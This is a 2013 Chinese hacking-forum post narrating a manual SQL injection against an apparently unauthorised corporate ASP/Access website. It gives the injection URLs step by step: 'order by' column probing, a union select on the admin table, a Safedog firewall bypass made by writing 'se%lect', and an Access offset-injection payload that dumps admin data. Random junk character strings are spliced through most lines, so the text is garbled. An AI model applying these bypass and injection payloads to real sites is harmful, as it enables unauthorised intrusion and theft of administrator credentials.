中国网络渗透测试联盟

标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入 [打印本页]

作者: admin    时间: 2013-3-8 21:49
标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。+ Q& x. k* \; N
, p7 j7 s3 B4 {% g, O# o

- F. \& w% q. H' S% M; T% h! ~/ E顺手加个admin- A. q; E: e. L- `4 [; i! L. J+ a

3 x3 X8 V0 Y# h( ~$ _# S) x% W+ M3 y- p0 Q) e
默认后台。: S8 l, Q$ t/ G, m7 t! h
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
; k0 U; X8 }4 g0 N
- B1 f7 y$ c1 c& g& ]  T/ o* V" a
' o- D( E3 C1 l7 @
9 x* y2 U! \0 C# W; C, H$ i所以就不用御剑扫了,待会直接封IP。
$ b6 ^- ?( u4 F' }  a: ? 1 {# _* E  p: W% s$ J# x  j
用order by语句判断是否存在注入。! A. z# Z9 q2 N" Z8 Q
http://www.xxx.com /product_show.asp?id=997 order by 1' @: m' V! o9 ]( B& j
http://www.xxx.com /product_show.asp?id=997 order by 100& b) l0 @1 n/ S, J
现在存在注入,经测试后发现是9个字段。, s2 `0 m& k9 {- S) ]

: G  ]# B& z0 K/ a/ e& T接下来进行联合查询,猜是否存在admin表。! k0 _6 J. o9 e& y
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
6 L5 Z2 e% k2 w# a8 M7 Y
3 p7 a  S; A7 w6 L" R+ _1 Q  }  n6 F9 a9 p- n

, v6 N2 n& F2 {在select中间加个%,se%lect绕过安全狗。
" Q/ K1 g: x  a; X7 y
; u# [8 Q2 Y4 g* b
0 R& N6 P4 n& I发现存在admin表,然后开始手工猜常用的字段。4 B8 R" i" Z, H1 ^- Z/ @' a
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
/ `+ M0 {! J4 T- B+ f
* w" y, T- J9 E1 F突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
( [1 _0 p1 n- g+ d8 n 0 g  j( L5 p, M* M: l  G
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。0 h$ N. O* G3 d9 h4 I
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
# f1 q4 j  E, b. _0 D# E5 o好了,敏感内容出显了。​1 f' B. f# @( A8 |* u
/ ~! m- p1 P' N4 u

. h  w3 F* j! d# a7 k$ R& g( p: m  ?; x- r5 M0 t3 `' q' i" G) c





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2